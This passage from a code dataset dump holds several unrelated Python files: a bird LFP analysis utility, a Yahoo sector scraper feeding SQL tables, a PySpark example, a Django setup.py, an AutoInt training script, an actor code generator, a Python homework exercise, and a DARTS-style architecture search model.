CF transform\n pcf_file = os.path.join(tdir, 'PairwiseCF_%s_%s_%s_%s_raw.h5' % (bird, block, segment, hemi))\n print\n 'Loading %s...' % pcf_file\n pcf = PairwiseCFTransform.load(pcf_file)\n\n def log_transform(x, dbnoise=100.):\n x /= x.max()\n zi = x > 0\n x[zi] = 20 * np.log10(x[zi]) + dbnoise\n x[x < 0] = 0\n x /= x.max()\n\n all_lfp_psds = deepcopy(pcf.psds)\n log_transform(all_lfp_psds)\n all_lfp_psds -= all_lfp_psds.mean(axis=0)\n all_lfp_psds /= all_lfp_psds.std(axis=0, ddof=1)\n\n # get overall biosound stats\n bs_stats = dict()\n for aprop in aprops:\n amean = bs.stim_df[aprop].mean()\n astd = bs.stim_df[aprop].std(ddof=1)\n bs_stats[aprop] = (amean, astd)\n\n for (stim_id2, stim_type2), gdf in se.segment_df.groupby(['stim_id', 'stim_type']):\n print\n '%d: %s' % (stim_id2, stim_type2)\n\n # get the spectrogram\n i = se.segment_df.stim_id == stim_id\n last_end_time = se.segment_df.end_time[i].max()\n\n spec_freq = se.spec_freq\n stim_spec = se.spec_by_stim[stim_id]\n spec_t = np.arange(stim_spec.shape[1]) / se.lfp_sample_rate\n speci = np.min(np.where(spec_t > last_end_time)[0])\n spec_t = spec_t[:speci]\n stim_spec = stim_spec[:, :speci]\n stim_dur = spec_t.max() - spec_t.min()\n\n # get the raw LFP\n si = int(se.pre_stim_time * se.lfp_sample_rate)\n ei = int(stim_dur * se.lfp_sample_rate) + si\n lfp = se.lfp_reps_by_stim['raw'][stim_id][:, :, si:ei]\n ntrials, nelectrodes, nt = lfp.shape\n\n # get the raw spikes, spike_mat is ragged array of shape (num_trials, num_cells, num_spikes)\n spike_mat = se.spikes_by_stim[stim_id]\n assert ntrials == len(spike_mat)\n\n ncells = len(se.cell_df)\n print\n 'ncells=%d' % ncells\n ntrials = len(spike_mat)\n\n # compute the PSTH\n psth = list()\n for n in range(ncells):\n # get the spikes across all trials for neuron n\n spikes = [spike_mat[k][n] for k in range(ntrials)]\n # make a PSTH\n _psth_t, _psth = compute_psth(spikes, stim_dur, bin_size=1.0 / se.lfp_sample_rate)\n psth.append(_psth)\n psth = np.array(psth)\n\n if hemi == 'L':\n electrode_order = ROSTRAL_CAUDAL_ELECTRODES_LEFT\n else:\n electrode_order = ROSTRAL_CAUDAL_ELECTRODES_RIGHT\n\n # get acoustic props and LFP/spike power spectra for each syllable\n syllable_props = list()\n\n i = bs.stim_df.stim_id == stim_id\n orders = sorted(bs.stim_df.order[i].values)\n cell_index2electrode = None\n for o in orders:\n i = (bs.stim_df.stim_id == stim_id) & (bs.stim_df.order == o)\n assert i.sum() == 1\n\n d = dict()\n d['start_time'] = bs.stim_df.start_time[i].values[0]\n d['end_time'] = bs.stim_df.end_time[i].values[0]\n d['order'] = o\n\n for aprop in aprops:\n amean, astd = bs_stats[aprop]\n d[aprop] = (bs.stim_df[aprop][i].values[0] - amean) / astd\n\n # get the LFP power spectra\n lfp_psd = list()\n for k, e in enumerate(electrode_order):\n i = (pcf.df.stim_id == stim_id) & (pcf.df.order == o) & (pcf.df.decomp == 'full') & \\\n (pcf.df.electrode1 == e) & (pcf.df.electrode2 == e)\n\n assert i.sum() == 1, \"i.sum()=%d\" % i.sum()\n\n index = pcf.df[i]['index'].values[0]\n lfp_psd.append(all_lfp_psds[index, :])\n d['lfp_psd'] = np.array(lfp_psd)\n\n syllable_props.append(d)\n\n return {'stim_id': stim_id, 'spec_t': spec_t, 'spec_freq': spec_freq, 'spec': stim_spec,\n 'lfp': lfp, 'spikes': spike_mat, 'lfp_sample_rate': se.lfp_sample_rate, 'psth': psth,\n 'syllable_props': syllable_props, 'electrode_order': electrode_order, 'psd_freq': pcf.freqs,\n 'cell_index2electrode': cell_index2electrode, 'aprops': aprops}\n\n\ndef get_electrode_dict(data_dir='/auto/tdrive/mschachter/data'):\n edata = pd.read_csv(os.path.join(data_dir, 'aggregate', 'electrode_data+dist.csv'))\n\n edict = dict()\n\n g = edata.groupby(['bird', 'block', 'hemisphere', 'electrode'])\n\n for (bird, block, hemi, electrode), gdf in g:\n assert len(gdf) == 1\n\n reg = clean_region(gdf.region.values[0])\n dist_l2a = gdf.dist_l2a.values[0]\n dist_midline = gdf.dist_midline.values[0]\n\n if bird == 'GreBlu9508M':\n dist_l2a *= 4\n\n edict[(bird, block, hemi, electrode)] = {'region': reg, 'dist_l2a': dist_l2a, 'dist_midline': dist_midline}\n\n return edict\n","sub_path":"zeebeez3/figures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409733433","text":"\"\"\"\nScript for setting up the sector, industry, and company tables in the 'stocks' database. \nThis script reads data from yahoo URLs, creates the tables in the database, and uploads the info into\nthe tables. The script does a lot of page access to Yahoo, so it should be run rarely.\nThere is no provision yet for updating the data; instead the tables are wiped out and recreated.\n\"\"\"\n\nimport re\n\n#import myql \nimport requests\nfrom bs4 import BeautifulSoup\n#import mechanize\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey, Enum\n\nimport DBEngine\n\n#Yahoo industry sector page\nbase_url = 'https://biz.yahoo.com/p/'\nsectors_url = 's_conameu.html'\n\ndef get_industry_data():\n r = requests.get(base_url+sectors_url)\n if r.status_code != requests.codes.ok:\n print(\"Could not open URL: \")+base_url+sectors_url\n \n sectors_page = BeautifulSoup(r.text,'lxml') #parses the html into a useful tree structure\n sectors = {} #dict with sector names as keys. Values are dicts with sector names as keys.\n template = re.compile(r'\\d+conameu.html')\n for link in sectors_page.find_all('a'):\n if template.match(link['href']):\n sector_name = sectors[link.string]\n sector_name.replace('\\n',' ',2)\n sectors[sector_name] = {'url':link['href'],'industries':{}}\n\n for k in sectors.keys():\n sector_url = sectors[k]['url']\n sector_response = requests.get(base_url+sector_url)\n sector_page = BeautifulSoup(sector_response.text,'lxml')\n if sector_response.status_code != requests.codes.ok:\n print(\"Could not open URL: \"+sector_url)\n \n industries = {} #dict with industry name as key \n template = re.compile(r'\\d\\d\\d+conameu.html')\n for link in sector_page.find_all('a'):\n if template.match(link['href']):\n industry_string = link.string\n industry_string.replace('\\n',' ',2)\n industries[industry_string] = {'url':link['href'], 'companies':{}}\n sectors[k]['industries'] = industries\n# break\n\n for ks in sectors.keys():\n industries = sectors[ks]['industries']\n for ki in industries.keys():\n companies = []\n url = industries[ki]['url']\n response = requests.get(base_url+url)\n page = BeautifulSoup(response.text,'lxml')\n if response.status_code != requests.codes.ok:\n print(\"Could not open URL: \"+url)\n name_template = re.compile(r'biz.yahoo.com/p/\\w/')\n ticker_template = re.compile(r'finance.yahoo.com/q\\?s=(\\w+)&')\n for link in page.find_all('a'):\n if name_template.search(link['href']):\n ticker_link = link.find_next('a')\n m = ticker_template.search(ticker_link['href'])\n if m is None:\n continue\n symbol = m.group(1)\n name = link.string\n name.replace('\\n',' ',2)\n if symbol:\n companies.append({'ticker':symbol.upper(),'name':name}) \n else:\n print(\"Could not find symbol for link \"+link['href'])\n industries[ki]['companies'] = companies\n# break\n# break\n\n return sectors\n\n\ndef build_sector_tables(engine, sectors):\n conn = engine.connect()\n sector_tables = ['sector','industry','company']\n\n for t in sector_tables:\n conn.execute('drop table if exists '+t)\n\n sector_list = sectors.keys()\n metadata = MetaData()\n sector_table = Table('sector', metadata,\n Column('id', Integer, primary_key=True),\n Column('sector', String(100)))\n\n industry_table = Table('industry', metadata,\n Column('id', Integer, primary_key=True),\n Column('sector', Enum(*sector_list)),\n Column('industry', String(100)))\n\n company_table = Table('company', metadata,\n Column('ticker', String(100)), #this should be a primary key, but don't set it here to avoid errors\n Column('name', String(100)),\n Column('industry', String(100)))\n\n metadata.create_all(engine)\n\n ins = sector_table.insert()\n for s in sector_list:\n conn.execute(ins,sector=s) \n\n ins_ind = industry_table.insert()\n ins_co = company_table.insert()\n for s in sectors.keys():\n industries = sectors[s]['industries']\n for i in industries.keys():\n companies = industries[i]['companies']\n conn.execute(ins_ind, sector=s, industry = i)\n for c in companies:\n conn.execute(ins_co, industry=i, ticker=c['ticker'], name=c['name'])\n \ndbname = 'stocks' \n#sectors = {'foo':{'url':'zip','industries':{'indA':{'companies':[{'name':'coA','ticker':'COA'}]}}},'bar':{}} #for dev only\nsectors = get_industry_data()\nprint(sectors)\nengine = DBEngine.create_engine(dbname)\nbuild_sector_tables(engine, sectors)\n\n \n\n\n \n","sub_path":"setupSectorIndustryCompany.py","file_name":"setupSectorIndustryCompany.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409051399","text":"import findspark \nfindspark.init()\nfrom pyspark.sql import SparkSession\n# Create the sparkSession\nsparkSession = SparkSession.builder.getOrCreate() \n# Create the sparkContext\nsc = sparkSession.sparkContext \n# Create RDD from file\ndepartmentsRDD = sc.textFile(\"C:\\\\data\\\\departments\")\n# Print all rows from the RDD\nfor i in departmentsRDD.collect():\n print(i)\n\n\"\"\" Output:\n\n2,Fitness\n3,Footwear\n4,Apparel\n5,Golf\n6,Outdoors\n7,Fan Shop\n\n\"\"\"\n","sub_path":"02.Create_RDD_From_File.py","file_name":"02.Create_RDD_From_File.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"387552856","text":"#!/usr/bin/env python3\n\nfrom setuptools import setup, find_packages\nimport io\nimport model_history\n\n\nwith io.open(\"README.md\", \"rt\", encoding=\"utf-8\") as fp:\n long_description = fp.read()\n\n\nsetup(\n packages=find_packages(),\n include_package_data=True,\n name=\"django-model-history\",\n version=model_history.__version__,\n description=\"Save model history\",\n long_description=long_description,\n author=model_history.__author__,\n author_email=model_history.__email__,\n url=\"https://bitbucket.org/rsalmaso/django-model-history\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Natural Language :: English\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n ],\n install_requires=[\"django\", \"djangorestframework\"],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"621414308","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nimport math\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.metrics import make_scorer\nfrom sklearn.model_selection import StratifiedKFold\nimport time\nfrom model import AutoInt\nimport argparse\nimport sys\nimport torch\n\n\ndef str2list(v):\n v=v.split(',')\n v=[int(_.strip('[]')) for _ in v]\n\n return v\n\n\ndef str2list2(v):\n v=v.split(',')\n v=[float(_.strip('[]')) for _ in v]\n\n return v\n\n\ndef str2bool(v):\n if v.lower() in ['yes', 'true', 't', 'y', '1']:\n return True\n elif v.lower() in ['no', 'false', 'f', 'n', '0']:\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--is_save', action='store_true') \n parser.add_argument('--greater_is_better', action='store_true', help='early stop criterion')\n parser.add_argument('--has_residual', action='store_true', help='add residual')\n\n parser.add_argument('--blocks', type=int, default=2, help='#blocks')\n parser.add_argument('--block_shape', type=str2list, default=[16,16], help='output shape of each block')\n parser.add_argument('--heads', type=int, default=2, help='#heads') \n parser.add_argument('--embedding_size', type=int, default=16) \n parser.add_argument('--dropout_keep_prob', type=str2list2, default=[1, 1, 1]) \n parser.add_argument('--epoch', type=int, default=2) \n parser.add_argument('--batch_size', type=int, default=1024) \n parser.add_argument('--learning_rate', type=float, default=0.001)\n parser.add_argument('--optimizer_type', type=str, default='adam') \n parser.add_argument('--l2_reg', type=float, default=0.0) \n parser.add_argument('--random_seed', type=int, default=2018) \n parser.add_argument('--save_path', type=str, default='./model') \n parser.add_argument('--field_size', type=int, default=39, help='#fields') \n parser.add_argument('--loss_type', type=str, default='logloss')\n parser.add_argument('--verbose', type=int, default=1)\n parser.add_argument('--run_times', type=int, default=1,help='run multiple times to eliminate error')\n parser.add_argument('--deep_layers', type=str2list, default=[300,300,300], help='config for dnn in joint train')\n parser.add_argument('--batch_norm', type=int, default=1)\n parser.add_argument('--embedding_norm', type=int, default=1)\n parser.add_argument('--batch_norm_decay', type=float, default=0.995)\n parser.add_argument('--data', default=\"avazu\", type=str, help='data name')\n parser.add_argument('--data_path', default=\"../../data\", type=str, help='root path for all the data')\n return parser.parse_args()\n\n#1049030\nfeature_size_dict = {\"avazu\": 972267, \"criteo\": 1049030, \"ipinyou\": 1015}\n\ndef _run_(args, run_cnt):\n path_prefix = os.path.join(args.data_path, args.data) \n \n Xi_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_i.h5\"), 'df').values\n Xv_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_v.h5\"), 'df').values\n y_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_y.h5\"), 'df').values.reshape(-1)\n \n Xi_train = pd.read_hdf(os.path.join(path_prefix, \"train_i.h5\"), 'df').values\n Xv_train = pd.read_hdf(os.path.join(path_prefix, \"train_v.h5\"), 'df').values\n y_train = pd.read_hdf(os.path.join(path_prefix, \"train_y.h5\"), 'df').values.reshape(-1)\n \n \n feature_size = feature_size_dict[args.data]\n\n args.field_size = Xi_valid.shape[1]\n \n # test: file1, valid: file2, train: file3-10\n model = AutoInt(args=args, feature_size=feature_size, run_cnt=run_cnt)\n\n is_continue = True\n for k in range(model.epoch):\n print(\"epoch %d\" %(k+1))\n if not is_continue:\n print('early stopping at epoch %d' % (k+1))\n break\n\n time_epoch = 0\n t1 = time.time()\n is_continue = model.fit_once(Xi_train, Xv_train, y_train, k+1, 0,\n Xi_valid, Xv_valid, y_valid, early_stopping=True)\n time_epoch += time.time() - t1\n print(\"epoch %d, time %d\" % (k+1, time_epoch))\n\n print('start testing!...')\n Xi_test = pd.read_hdf(os.path.join(path_prefix, \"test_i.h5\"), 'df').values\n Xv_test = pd.read_hdf(os.path.join(path_prefix, \"test_v.h5\"), 'df').values\n y_test = pd.read_hdf(os.path.join(path_prefix, \"test_y.h5\"), 'df').values.reshape(-1)\n\n model.restore()\n\n test_result, test_loss = model.evaluate(Xi_test, Xv_test, y_test)\n \n print(\"test-result = %.4lf, test-logloss = %.4lf\" % (test_result, test_loss))\n return test_result, test_loss\n\nif __name__ == \"__main__\":\n args = parse_args()\n print(args.__dict__)\n print('**************')\n test_auc = []\n test_log = []\n timemark = time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))\n\n print('run time : %d' % args.run_times)\n for i in range(1, args.run_times + 1):\n test_result, test_loss = _run_(args, i)\n test_auc.append(test_result)\n test_log.append(test_loss)\n \n params_str = \" \".join([\"{} {}\".format(k, v) for k, v in vars(args).items()])\n info = \"[{}] | {} | {}| test auc [{:.6f}], test logloss [{:.6f}] | {} \\n\".format(\n timemark, args.data, \"autoint\", test_auc[0], test_log[0], params_str)\n\n with open(\"../../benchmark/training_info.txt\", \"a+\") as fw:\n fw.write(info) \n \n print('test_auc', test_auc)\n print('test_log_loss', test_log)\n print('avg_auc', sum(test_auc)/len(test_auc))\n print('avg_log_loss', sum(test_log)/len(test_log))\n\n","sub_path":"baseline/autoint/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"390756887","text":"\"\"\"\nn = 8\narr = [3,1,6,6,5,7,7,7]\n\ndef runnerUp(n,arr):\n if 2 <= n <= 10:\n arr_sorted = sorted(arr)\n last_higher = max(arr_sorted)\n i = 0\n\n while i < n:\n if arr[-(i+1)] == last_higher:\n i += 1\n else:\n runner_up = arr[-(i+1)]\n i = n\n\n print(runner_up)\n\n else:\n print('imput a value between [2,10]')\n\nrunnerUp(n,arr)\n\n------------------------------------\n\nn = int(input())\narr = arr(map(int, input().split()))\nzes = max(arr)\ni=0\nwhile(i 0 and paramCodeStr[-1] == \",\":\n paramCodeStr = paramCodeStr[:-1]\n if paramCodeStr != \"\":\n s = s.replace(\"{paramcodestr}\", self.descrTo1Line(paramCodeStr))\n else:\n s = s.replace(\"{paramcodestr}\", \"\")\n\n self.content += \"\\n%s\" % j.code.indent(s, 1)\n\n params = \"\"\n for var in method.vars:\n params += \"%s=%s,\" % (var.name, var.name)\n if params != \"\" and params[-1] == \",\":\n params = params[:-1]\n\n s = \"resultcode,result=self._appserverclient.wsclient.callWebService(\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%s)\" %\\\n (self.spec.appname, self.spec.actorname, method.name.replace(\"_\", \".\"), params)\n\n s += \"\"\"\nif resultcode != 0:\n raise RuntimeError(\"error in calling webservice %s:%s:%s:%s\" )\nelse:\n if j.basetype.dictionary.check(result) and result.has_key(\"result\"):\n return result[\"result\"]\n else:\n return result\n\"\"\" % (self.spec.appname, self.spec.actorname, method.name, params)\n\n s += \"\\nfrom JumpScale.core.Shell import ipshell\\n\"\n s += \"ipshell()\\n\"\n\n #key=\"%s_%s_%s\" % (spec.appname,spec.actorname,method.name)\n self.content += \"\\n%s\" % j.code.indent(s, 2)\n\n return\n\n def generate(self):\n self.addClass()\n\n s = \"self._appserverclient=j.clients.portal._portalClients[\\\"%s_%s_%s\\\"]\" % (self.ip, self.port, self.secret)\n self.initprops += j.code.indent(s, 2)\n\n for method in self.spec.methods:\n self.addMethod(method)\n\n return self.getContent()\n","sub_path":"lib/JumpScale/baselib/codegentools/CodeGeneratorActorRemote.py","file_name":"CodeGeneratorActorRemote.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56117736","text":"#1、运行时分别提醒用户输入 姓名、性别、年龄 ,输入完了,请将数据存储为一个字典,u为用户\nu = {'姓名':'','性别':'','年龄':''}\nu['姓名'] = input('请输入您的姓名:')\nu['性别'] = input('请输入您的性别:')\nu['年龄'] = int(input('请输入您的年龄:'))\n\n#2、数据存储完了,然后输出个人介绍,格式如下: 我的名字XXX,今年XXX岁,性别XX,喜欢敲代码\nprint(f\"我的名字{u['姓名']},今年{u['年龄']}岁,性别{u['性别']},喜欢敲代码\")\n\n#3、有一个人对你很感兴趣,平台需要您补足您的身高和联系方式; 要求提醒用户输入身高、联系方式,把数据添加到1中创建的字典\nu['身高']=input('请输入您的身高:')\nu['联系方式']=input('请输入您的联系方式:')\n\n#4、用循环输出任务3完成后的字典中的所有信息,格式如下(5项数据之间没有顺序要求)\nfor key in u:\n print(key+':',u[key])\n\n#5、当前有一个列表 li = [11,22,33,22,22,44,55,77,88,99,11],请去除重复元素之后,再统计元素的数量\nli = [11,22,33,22,22,44,55,77,88,99,11]\nlq = list(set(li))\nlq.sort(key=li.index)\nprint(lq)\nset1 = set(lq)\ndict1 = {}\nfor item in set1:\n dict1.update({item:lq.count(item)})\nprint(dict1)\n\n#6、li = [1,2,3,4,5,6,7,8,9] 请通过切片得出结果 [3,6,9]\nli = [1,2,3,4,5,6,7,8,9]\nliq = li[2:9:3]\nprint(liq)\n\n#7、s = 'python java php',通过切片获取: ‘java’\ns = 'python java php'\nprint(s[7:11])\n","sub_path":"homework5/Group5/hw5_1720379.py","file_name":"hw5_1720379.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"649380937","text":"import torch.nn.functional as F\nfrom operations import *\nfrom torch.autograd import Variable\nfrom genotypes import PRIMITIVES\nfrom genotypes import Genotype\nimport numpy as np\nfrom itertools import combinations\nimport torch\n\n\nclass MixedOp(nn.Module):\n\n def __init__(self, C, stride):\n super(MixedOp, self).__init__()\n self._ops = nn.ModuleList()\n for primitive in PRIMITIVES:\n op = OPS[primitive](C, stride, False)\n if 'pool' in primitive:\n op = nn.Sequential(op, nn.BatchNorm2d(C, affine=False))\n self._ops.append(op)\n\n def forward(self, x, weights):\n return sum(w * op(x) for w, op in zip(weights, self._ops) if w != 0)\n\n\nclass Cell(nn.Module):\n\n def __init__(self, steps, multiplier, C_prev_prev, C_prev, C, reduction, reduction_prev):\n super(Cell, self).__init__()\n self.reduction = reduction\n\n if reduction_prev:\n self.preprocess0 = FactorizedReduce(C_prev_prev, C, affine=False)\n else:\n self.preprocess0 = ReLUConvBN(C_prev_prev, C, 1, 1, 0, affine=False)\n self.preprocess1 = ReLUConvBN(C_prev, C, 1, 1, 0, affine=False)\n self._steps = steps\n self._multiplier = multiplier\n\n self._ops = nn.ModuleList()\n self._bns = nn.ModuleList()\n for i in range(self._steps):\n for j in range(2 + i):\n stride = 2 if reduction and j < 2 else 1\n op = MixedOp(C, stride)\n self._ops.append(op)\n\n def forward(self, s0, s1, weights, weights_edge):\n\n s0 = self.preprocess0(s0)\n s1 = self.preprocess1(s1)\n\n states = [s0, s1]\n offset = 0\n offset_tp = 0\n for i in range(self._steps):\n if weights_edge is None:\n s = sum(self._ops[offset + j](h, weights[offset + j]) for j, h in enumerate(states))\n offset += len(states)\n states.append(s)\n else:\n comb = list(combinations(list(range(i + 2)), 2))\n # print(\"combination:%d\"%i,comb)\n offset_tp_end = offset_tp + Cal_Combination_Numbers(2 + i, 2)\n # print(\"begin,end:\",offset_tp,offset_tp_end)\n w_tp = weights_edge[offset_tp:offset_tp_end]\n # print(\"weight_edge_shape:\",weights_edge.shape)\n w_tp_edge = torch.zeros(len(states), device=weights_edge.device, dtype=weights_edge.dtype)\n # print(\"w_tp_edge_shape:\",w_tp_edge.shape)\n\n for w, edges in zip(w_tp, comb):\n w_tp_edge[edges[0]] += w\n w_tp_edge[edges[1]] += w\n # print(\"w_tp_edge:\",w_tp_edge)\n\n s = sum(w_tp_edge[j] * self._ops[offset + j](h, weights[offset + j]) for j, h in enumerate(states))\n offset += len(states)\n offset_tp = offset_tp_end\n states.append(s)\n return torch.cat(states[-self._multiplier:], dim=1)\n\n\ndef Cal_Combination_Numbers(n, r):\n '''\n C_{n}^{r}\n :param m:\n :param n:\n :return:\n '''\n return int(np.math.factorial(n) / (np.math.factorial(n - r) * np.math.factorial(r)))\n\n\nclass Network(nn.Module):\n\n def __init__(self, C, num_classes, layers, criterion, steps=4, multiplier=4, stem_multiplier=3, init_arch=True):\n super(Network, self).__init__()\n self._C = C\n self._num_classes = num_classes\n self._layers = layers\n self._criterion = criterion\n self._steps = steps\n self._multiplier = multiplier\n\n self.phase = 'op_pretrain'\n self.T = 1.0\n\n C_curr = stem_multiplier * C\n self.stem0 = nn.Sequential(\n nn.Conv2d(3, C_curr // 2, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(C_curr // 2, C_curr, 3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr),\n )\n\n self.stem1 = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(C_curr, C_curr, 3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr),\n )\n\n C_prev_prev, C_prev, C_curr = C_curr, C_curr, C\n self.cells = nn.ModuleList()\n\n reduction_prev = True\n for i in range(layers):\n if i in [layers // 3, 2 * layers // 3]:\n C_curr *= 2\n reduction = True\n else:\n reduction = False\n cell = Cell(steps, multiplier, C_prev_prev, C_prev, C_curr, reduction, reduction_prev)\n reduction_prev = reduction\n self.cells += [cell]\n C_prev_prev, C_prev = C_prev, multiplier * C_curr\n\n self.global_pooling = nn.AdaptiveAvgPool2d(1)\n self.lastact = nn.Sequential(nn.BatchNorm2d(C_prev), nn.ReLU(inplace=True))\n self.classifier = nn.Linear(C_prev, num_classes)\n if init_arch:\n self._initialize_alphas()\n\n def new(self):\n model_new = Network(self._C, self._num_classes, self._layers, self._criterion).cuda()\n for x, y in zip(model_new.arch_parameters(), self.arch_parameters()):\n x.data.copy_(y.data)\n return model_new\n\n def parse_edge(self):\n betas_normal = self.betas_normal\n betas_reduce = self.betas_reduce\n normal_edge_dict = {}\n reduce_edge_dict = {}\n for step in range(self._steps):\n normal_edge_dict['normal_node1'] = list(F.softmax(betas_normal[0:1], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node2'] = list(F.softmax(betas_normal[1:4], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node3'] = list(F.softmax(betas_normal[4:10], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node4'] = list(F.softmax(betas_normal[10:20], dim=-1).detach().cpu().numpy())\n for step in range(self._steps):\n reduce_edge_dict['reduce_node1'] = list(F.softmax(betas_reduce[0:1], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node2'] = list(F.softmax(betas_reduce[1:4], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node3'] = list(F.softmax(betas_reduce[4:10], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node4'] = list(F.softmax(betas_reduce[10:20], dim=-1).detach().cpu().numpy())\n return normal_edge_dict, reduce_edge_dict\n\n def prune_model(self):\n k = sum(1 for i in range(self._steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n self.bool_mask_normal = torch.zeros(k, num_ops)\n self.bool_mask_reduce = torch.zeros(k, num_ops)\n\n alphas_normal_non_params = self.alphas_normal_non_params\n alphas_normal_params = self.alphas_normal_params\n alphas_reduce_non_params = self.alphas_reduce_non_params\n alphas_reduce_params = self.alphas_reduce_params\n\n for idx, weight in enumerate(alphas_normal_params):\n self.bool_mask_normal[idx, 4 + torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_normal_non_params):\n self.bool_mask_normal[idx, torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_reduce_params):\n self.bool_mask_reduce[idx, 4 + torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_reduce_non_params):\n self.bool_mask_reduce[idx, torch.argmax(weight)] = 1\n\n self.bool_mask_normal = self.bool_mask_normal.cuda()\n self.bool_mask_reduce = self.bool_mask_reduce.cuda()\n\n # init prune model\n self.alphas_normal_balance = Variable(1e-3 * torch.zeros(k, 2).cuda(), requires_grad=True)\n self.alphas_reduce_balance = Variable(1e-3 * torch.zeros(k, 2).cuda(), requires_grad=True)\n self.betas_normal = Variable(1e-3 * torch.zeros(\n Cal_Combination_Numbers(2, 2) + Cal_Combination_Numbers(3, 2) + Cal_Combination_Numbers(4,\n 2) + Cal_Combination_Numbers(\n 5, 2)).cuda(), requires_grad=True)\n self.betas_reduce = Variable(1e-3 * torch.zeros(\n Cal_Combination_Numbers(2, 2) + Cal_Combination_Numbers(3, 2) + Cal_Combination_Numbers(4,\n 2) + Cal_Combination_Numbers(\n 5, 2)).cuda(), requires_grad=True)\n del self.alphas_normal_non_params\n del self.alphas_normal_params\n del self.alphas_reduce_non_params\n del self.alphas_reduce_params\n self._arch_parameters = [\n self.alphas_normal_balance,\n self.alphas_reduce_balance,\n self.betas_normal,\n self.betas_reduce,\n ]\n\n def forward(self, input):\n\n assert 'op' in self.phase, \"error\"\n\n weights_reduce_non_params = F.softmax(self.alphas_reduce_non_params / self.T, dim=-1)\n weights_reduce_params = F.softmax(self.alphas_reduce_params / self.T, dim=-1)\n weights_reduce = torch.cat([weights_reduce_non_params, weights_reduce_params], -1)\n\n weights_normal_non_params = F.softmax(self.alphas_normal_non_params / self.T, dim=-1)\n weights_normal_params = F.softmax(self.alphas_normal_params / self.T, dim=-1)\n weights_normal = torch.cat([weights_normal_non_params, weights_normal_params], -1)\n\n s0 = self.stem0(input)\n s1 = self.stem1(s0)\n\n for i, cell in enumerate(self.cells):\n if cell.reduction:\n weights = weights_reduce\n weights_edge = None\n else:\n weights = weights_normal\n weights_edge = None\n s0, s1 = s1, cell(s0, s1, weights, weights_edge)\n\n s1 = self.lastact(s1)\n out = self.global_pooling(s1)\n logits = self.classifier(out.view(out.size(0), -1))\n\n return logits\n\n def forward_tp(self, input):\n assert 'tp' in self.phase, \"error\"\n\n weights_reduce_balance = F.softmax(self.alphas_reduce_balance / (1e-3 * self.T), dim=-1) # 1e-3 or 1e-1\n weights_reduce = torch.zeros_like(self.bool_mask_reduce)\n weights_reduce[:, :4] = self.bool_mask_reduce[:, :4] * weights_reduce_balance[:, :1]\n weights_reduce[:, 4:] = self.bool_mask_reduce[:, 4:] * weights_reduce_balance[:, 1:]\n\n weights_normal_balance = F.softmax(self.alphas_normal_balance / (1e-3 * self.T), dim=-1)\n weights_normal = torch.zeros_like(self.bool_mask_normal)\n weights_normal[:, :4] = self.bool_mask_normal[:, :4] * weights_normal_balance[:, :1]\n weights_normal[:, 4:] = self.bool_mask_normal[:, 4:] * weights_normal_balance[:, 1:]\n\n s0 = self.stem0(input)\n s1 = self.stem1(s0)\n\n for i, cell in enumerate(self.cells):\n if cell.reduction:\n weights = weights_reduce\n\n start = 1\n weights_edge = F.softmax(self.betas_reduce[0:Cal_Combination_Numbers(2, 2)] / self.T, dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 2)\n tw2 = F.softmax(self.betas_reduce[start:end] / self.T, dim=-1)\n start = end\n weights_edge = torch.cat([weights_edge, tw2], dim=0)\n\n else:\n weights = weights_normal\n\n start = 1\n weights_edge = F.softmax(self.betas_normal[0:Cal_Combination_Numbers(2, 2)] / self.T, dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 